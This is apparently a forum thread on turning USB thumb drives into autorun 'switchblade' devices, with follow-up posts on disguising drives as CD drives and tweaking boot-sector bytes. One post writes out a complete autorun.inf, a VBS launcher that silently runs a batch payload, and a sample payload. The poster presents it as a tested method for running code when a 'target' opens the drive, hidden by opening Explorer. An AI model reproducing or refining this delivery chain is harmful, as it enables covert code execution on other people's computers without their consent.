I have a silly question. Plz don't flame me.

Has anyone yet tried this approach?

autorun.inf Contains:

[Autorun]

open=wscript .go.vbs

shellverb0command=wscript .go.vbs

shellverb0=&Open

shell=verb0

And go.vbs contains the payload eg:

CreateObject("Wscript.Shell").Run """" & ".load.cmd" & """", 0, False

wscript.echo "You have been Owned" 'This is just to show it ran...

load.cmd contains anything you want so eg:

@explorer .

@echo off

@dir >.it_ran.txt

@exit

Files in the root of the USB thumb drive.

If the target double clicks on the drive letter they run the payload. If they right click and open they run the payload. Both can be masked by opening explorer in the payload.

This has served me faithfully for three years and requires no special type of drive.

Just thought I should mention it.

Hummm did the research autorun on Remvoeable media is not enabled by default in XP :(

I am not able to download the utilities because of bandwidth restriction while I am out to sea but see what you can do with that and I will try some more when I get back next week. Hope it helps. 8)

Hey fellow researchers

I have just cracked how to turn any USB drive into a switchblade. I'll say that again. I JUST MANAGED TO GET MY NON U3 USB THUMB DRIVE TO AUTOSTART. No pre installed software. I found out how a cd drive is recognised and changed the characteristics of a standard USB drive to look the same. And it is easy to do.

I'm just not sure I should disclose it? What do you think? Too dangerous? Normally I am all for full disclosure but well maybe I should do this one anonymously :

I thought you already did it?

For those of you having trouble formatting your USB drive with NTFS in Windows XP, do this:

Go to Device Manager and set the policy of the USB Stick device to "Optimize for Performance". The default is to optimize for Quick Removal, which restricts you to the FAT filesystem.

I tried MaxDamage's method of editing the first byte and formatting, the drive in NTFS, but for some reason the format changes the hex back to EB from AB. Maybe a way windows formats the drive? I will try formatting the drive under linux and see if that helps.

Edit: Formatting it through linux also changes it back to EB. How do we keep it from changing back?
